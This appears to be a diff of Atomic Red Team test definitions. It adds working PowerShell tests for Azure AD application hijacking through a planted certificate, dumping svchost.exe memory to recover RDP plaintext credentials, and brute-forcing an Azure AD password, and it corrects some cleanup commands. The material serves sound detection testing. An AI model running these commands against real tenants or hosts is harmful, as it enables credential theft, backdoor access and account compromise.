+      auto_generated_guid: a12b5531-acab-4618-a470-0dafb294a87a
+      description: |
+        Add a certificate to an Application through its App Registration.
+        The certificate can then be used to authenticate as the application and benefit from its rights.
+        An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: String
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: String
+          default: p4sswd
+        application_name:
+          description: Name of the targeted application
+          type: String
+          default: SuperApp
+        certificate_password:
+          description: Password of the new certificate
+          type: string
+          default: Passw0rd
+        path_to_cert:
+          description: Path of the new certificate, locally stored
+          type: string
+          default: "$env:TEMP"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AzureAD module must be installed.
+
+'
+        prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        command: |
+          Import-Module -Name AzureAD
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzureAD -Credential $Credential
+
+          $app = Get-AzureADApplication -Searchstring "#{application_name}"
+          if ($app -eq $null) { Write-Warning "Application not found"; exit }
+          $certNotAfter = (Get-Date).AddDays(2)
+          $credNotAfter = (Get-Date).AddDays(1)
+          $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+          $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+          Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd
+
+          $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+          $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+          New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+          Start-Sleep -s 30
+          $tenant=Get-AzureADTenantDetail
+          $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+          Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+          Write-Host "End of Hijacking"
+        cleanup_command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString
+          -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
+          System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
+          $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication
+          -Searchstring \"#{application_name}\"\n$credz = Get-AzureADApplicationKeyCredential
+          -ObjectId $app.ObjectId\nforeach ($cred in $credz) {\n  if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier)
+          -eq \"AtomicTest\") {\n    Remove-AzureADApplicationKeyCredential -ObjectId
+          $app.ObjectId -KeyId $cred.KeyId\n  }  \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
+          | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"\n"
+        name: powershell
+        elevation_required: false
    - name: AWS - Create Access Key and Secret Key
      auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
      description: 'Adversaries create their own new access and secret keys to programatically
@@ -39773,7 +40002,7 @@ persistence:
          $User.DisplayName = $SamAccountName
          $User.Save()
          $User
-        cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
+        cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1"

 '
        name: powershell
@@ -41381,7 +41610,7 @@ persistence:
        command: |
          sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
          sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
-        cleanup: |
+        cleanup_command: |
          sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
          sudo rm /Library/LaunchDaemons/#{plist_filename}
  T1053.004:
@@ -51395,7 +51624,7 @@ discovery:

 '
        name: bash
-        elevation_require: true
+        elevation_required: true
    - name: Network Share Discovery command prompt
      auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
      description: |
@@ -11,6 +11,8 @@ Several of the tools mentioned in associated sub-techniques may be used by both

 - [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)

+- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
+

 <br/>

@@ -133,4 +135,41 @@ Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f



+<br/>
+<br/>
+
+## Atomic Test #3 - Dump svchost.exe to gather RDP credentials
+The svchost.exe contains the RDP plain-text credentials.
+Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
+
+Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
+if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
+C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>
@@ -85,3 +85,23 @@ atomic_tests:
      Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
    name: powershell
    elevation_required: true
+    
+- name: Dump svchost.exe to gather RDP credentials
+  auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
+  description: |
+    The svchost.exe contains the RDP plain-text credentials.
+    Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
+    
+    Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
+      if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
+      C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
+    cleanup_command: |
+      Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+
@@ -93,6 +93,18 @@ sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth



+#### Dependencies:  Run with `sh`!
+##### Description: Checking if pam_tty_audit.so is installed
+##### Check Prereq Commands:
+```sh
+test -f '/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so'
+```
+##### Get Prereq Commands:
+```sh
+echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work"
+```
+
+


 <br/>
@@ -32,10 +32,13 @@ atomic_tests:
    Passwords hidden by the console can also be logged, with 'log_passwd' as in this example.  If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
   
    Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary.  Mac OS does not currently contain the pam_tty_audit.so library. 
-  prereq_command: |
-    test -f '/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so'
-  get_prereq_command: |
-    echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work"
+  dependencies:
+  - description: |
+      Checking if pam_tty_audit.so is installed
+    prereq_command: |
+      test -f '/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so'
+    get_prereq_command: |
+      echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work"
  supported_platforms:
  - linux
  executor:
@@ -8,12 +8,197 @@ In infrastructure-as-a-service (IaaS) environments, after gaining access through

 ## Atomic Tests

- [Atomic Test #1 - AWS - Create Access Key and Secret Key](#atomic-test-1---aws---create-access-key-and-secret-key)
+- [Atomic Test #1 - Azure AD Application Hijacking - Service Principal](#atomic-test-1---azure-ad-application-hijacking---service-principal)
+
+- [Atomic Test #2 - Azure AD Application Hijacking - App Registration](#atomic-test-2---azure-ad-application-hijacking---app-registration)
+
+- [Atomic Test #3 - AWS - Create Access Key and Secret Key](#atomic-test-3---aws---create-access-key-and-secret-key)


 <br/>

-## Atomic Test #1 - AWS - Create Access Key and Secret Key
+## Atomic Test #1 - Azure AD Application Hijacking - Service Principal
+Add a certificate to an Application through its Service Principal.
+The certificate can then be used to authenticate as the application and benefit from its rights.
+An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** b8e747c3-bdf7-4d71-bce2-f1df2a057406
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| service_principal_name | Name of the targeted service principal | String | SuperSP|
+| certificate_password | Password of the new certificate | string | Passw0rd|
+| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
+if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
+$certNotAfter = (Get-Date).AddDays(2)
+$credNotAfter = (Get-Date).AddDays(1)
+$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd
+
+$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+Start-Sleep -s 30
+$tenant=Get-AzureADTenantDetail
+$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+Write-Host "End of Hijacking"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
+$credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
+foreach ($cred in $credz) {
+  if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") {
+    Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId
+  }  
+}
+Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
+rm "#{path_to_cert}\#{service_principal_name}.pfx"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+if (Get-Module AzureAD) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Azure AD Application Hijacking - App Registration
+Add a certificate to an Application through its App Registration.
+The certificate can then be used to authenticate as the application and benefit from its rights.
+An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** a12b5531-acab-4618-a470-0dafb294a87a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| application_name | Name of the targeted application | String | SuperApp|
+| certificate_password | Password of the new certificate | string | Passw0rd|
+| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$app = Get-AzureADApplication -Searchstring "#{application_name}"
+if ($app -eq $null) { Write-Warning "Application not found"; exit }
+$certNotAfter = (Get-Date).AddDays(2)
+$credNotAfter = (Get-Date).AddDays(1)
+$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd
+
+$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+Start-Sleep -s 30
+$tenant=Get-AzureADTenantDetail
+$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+Write-Host "End of Hijacking"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$app = Get-AzureADApplication -Searchstring "#{application_name}"
+$credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
+foreach ($cred in $credz) {
+  if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") {
+    Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId
+  }  
+}
+Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
+rm "#{path_to_cert}\#{application_name}.pfx"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+if (Get-Module AzureAD) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - AWS - Create Access Key and Secret Key
 Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised

 **Supported Platforms:** Iaas:aws
@@ -1,6 +1,171 @@
 attack_technique: T1098.001
 display_name: 'Account Manipulation: Additional Cloud Credentials'
 atomic_tests:
+- name: Azure AD Application Hijacking - Service Principal
+  auto_generated_guid: b8e747c3-bdf7-4d71-bce2-f1df2a057406
+  description: |
+    Add a certificate to an Application through its Service Principal.
+    The certificate can then be used to authenticate as the application and benefit from its rights.
+    An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Azure AD username
+      type: String
+      default: jonh@contoso.com
+    password:
+      description: Azure AD password
+      type: String
+      default: p4sswd
+    service_principal_name:
+      description: Name of the targeted service principal
+      type: String
+      default: SuperSP
+    certificate_password:
+      description: Password of the new certificate
+      type: string
+      default: Passw0rd
+    path_to_cert:
+      description: Path of the new certificate, locally stored 
+      type: string
+      default: $env:TEMP
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AzureAD module must be installed.
+    prereq_command: |
+      if (Get-Module AzureAD) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  executor:
+    command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
+      if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+      # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
+      $certNotAfter = (Get-Date).AddDays(2)
+      $credNotAfter = (Get-Date).AddDays(1)
+      $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+      $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+      Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd
+
+      $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+      $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+      New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+      Start-Sleep -s 30
+      $tenant=Get-AzureADTenantDetail
+      $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+      Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+      Write-Host "End of Hijacking"
+
+    cleanup_command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
+      $credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
+      foreach ($cred in $credz) {
+        if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") {
+          Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId
+        }  
+      }
+      Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
+      rm "#{path_to_cert}\#{service_principal_name}.pfx"
+      
+    name: powershell
+    elevation_required: false
+
+- name: Azure AD Application Hijacking - App Registration
+  auto_generated_guid: a12b5531-acab-4618-a470-0dafb294a87a
+  description: |
+    Add a certificate to an Application through its App Registration.
+    The certificate can then be used to authenticate as the application and benefit from its rights.
+    An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Azure AD username
+      type: String
+      default: jonh@contoso.com
+    password:
+      description: Azure AD password
+      type: String
+      default: p4sswd
+    application_name:
+      description: Name of the targeted application 
+      type: String
+      default: SuperApp
+    certificate_password:
+      description: Password of the new certificate
+      type: string
+      default: Passw0rd
+    path_to_cert:
+      description: Path of the new certificate, locally stored 
+      type: string
+      default: $env:TEMP
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AzureAD module must be installed.
+    prereq_command: |
+      if (Get-Module AzureAD) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  executor:
+    command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $app = Get-AzureADApplication -Searchstring "#{application_name}"
+      if ($app -eq $null) { Write-Warning "Application not found"; exit }
+      $certNotAfter = (Get-Date).AddDays(2)
+      $credNotAfter = (Get-Date).AddDays(1)
+      $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+      $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+      Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd
+
+      $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+      $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+      New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+      Start-Sleep -s 30
+      $tenant=Get-AzureADTenantDetail
+      $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+      Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+      Write-Host "End of Hijacking"
+
+    cleanup_command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $app = Get-AzureADApplication -Searchstring "#{application_name}"
+      $credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
+      foreach ($cred in $credz) {
+        if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") {
+          Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId
+        }  
+      }
+      Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
+      rm "#{path_to_cert}\#{application_name}.pfx"
+
+    name: powershell
+    elevation_required: false
+    
 - name: AWS - Create Access Key and Secret Key
  auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
  description: |
@@ -28,4 +193,7 @@ atomic_tests:
      access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
      aws iam delete-access-key --access-key-id $access_key --user-name #{username}
      rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
-    name: sh
+    name: sh
+    
+    
+
@@ -29,6 +29,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t

 - [Atomic Test #2 - Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)](#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos)

+- [Atomic Test #3 - Brute Force Credentials of single Azure AD user](#atomic-test-3---brute-force-credentials-of-single-azure-ad-user)
+

 <br/>

@@ -131,4 +133,66 @@ Write-Host "End of bruteforce"



+<br/>
+<br/>
+
+## Atomic Test #3 - Brute Force Credentials of single Azure AD user
+Attempt to brute force Azure AD user via AzureAD powershell module.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 5a51ef57-299e-4d62-8e11-2d440df55e69
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@<valid_ms_account.com>" | String | bruce.wayne@contoso.com|
+| passwords | List of passwords we will attempt to brute force with | String | Password1`n1q2w3e4r`nPassword!|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module -Name AzureAD
+
+$passwords = "#{passwords}".split("{`n}")
+foreach($password in $passwords) {
+  $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
+  $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+  try {
+    Write-Host " [-] Attempting ${password} on account #{username}."
+    Connect-AzureAD -Credential $Credential 2>&1> $null
+    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+    Write-Host " [!] #{username}:${password} are valid credentials!`r`n"
+    break
+  } catch {
+    Write-Host " [-] #{username}:${password} invalid credentials.`r`n"
+  }
+}
+Write-Host "End of bruteforce"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+if (Get-Module AzureAD) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
 <br/>
@@ -84,3 +84,47 @@ atomic_tests:
        }
      }
      Write-Host "End of bruteforce"
+- name: Brute Force Credentials of single Azure AD user
+  auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69
+  description: |
+    Attempt to brute force Azure AD user via AzureAD powershell module.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@<valid_ms_account.com>"
+      type: String
+      default: bruce.wayne@contoso.com
+    passwords:
+      description: List of passwords we will attempt to brute force with
+      type: String
+      default: Password1`n1q2w3e4r`nPassword!
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AzureAD module must be installed.
+    prereq_command: |
+      if (Get-Module AzureAD) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Import-Module -Name AzureAD
+
+      $passwords = "#{passwords}".split("{`n}")
+      foreach($password in $passwords) {
+        $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
+        $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+        try {
+          Write-Host " [-] Attempting ${password} on account #{username}."
+          Connect-AzureAD -Credential $Credential 2>&1> $null
+          # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+          Write-Host " [!] #{username}:${password} are valid credentials!`r`n"
+          break
+        } catch {
+          Write-Host " [-] #{username}:${password} invalid credentials.`r`n"
+        }
+      }
+      Write-Host "End of bruteforce"
@@ -75,7 +75,7 @@ Network Share Discovery using smbstatus
 | package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba|


-#### Attack Commands: Run with `bash`! 
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 


 ```bash
@@ -45,7 +45,7 @@ atomic_tests:
    command: |
      smbstatus --shares
    name: bash
-    elevation_require: true
+    elevation_required: true
 - name: Network Share Discovery command prompt
  auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
  description: |
@@ -133,7 +133,7 @@ $User

 #### Cleanup Commands:
 ```powershell
-net user "#{username}" >nul 2>&1 /del /domain
+cmd /c "net user #{username} /del >nul 2>&1"
 ```


@@ -81,6 +81,6 @@ atomic_tests:
      $User.Save()
      $User
    cleanup_command: |
-      net user "#{username}" >nul 2>&1 /del /domain
+      cmd /c "net user #{username} /del >nul 2>&1"
    name: powershell
    elevation_required: false  # Requires a user to be a Domain Admin!
@@ -40,6 +40,11 @@ sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
 sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
 ```

+#### Cleanup Commands:
+```bash
+sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
+sudo rm /Library/LaunchDaemons/#{plist_filename}
+```



@@ -32,7 +32,7 @@ atomic_tests:
    command: |
      sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
      sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
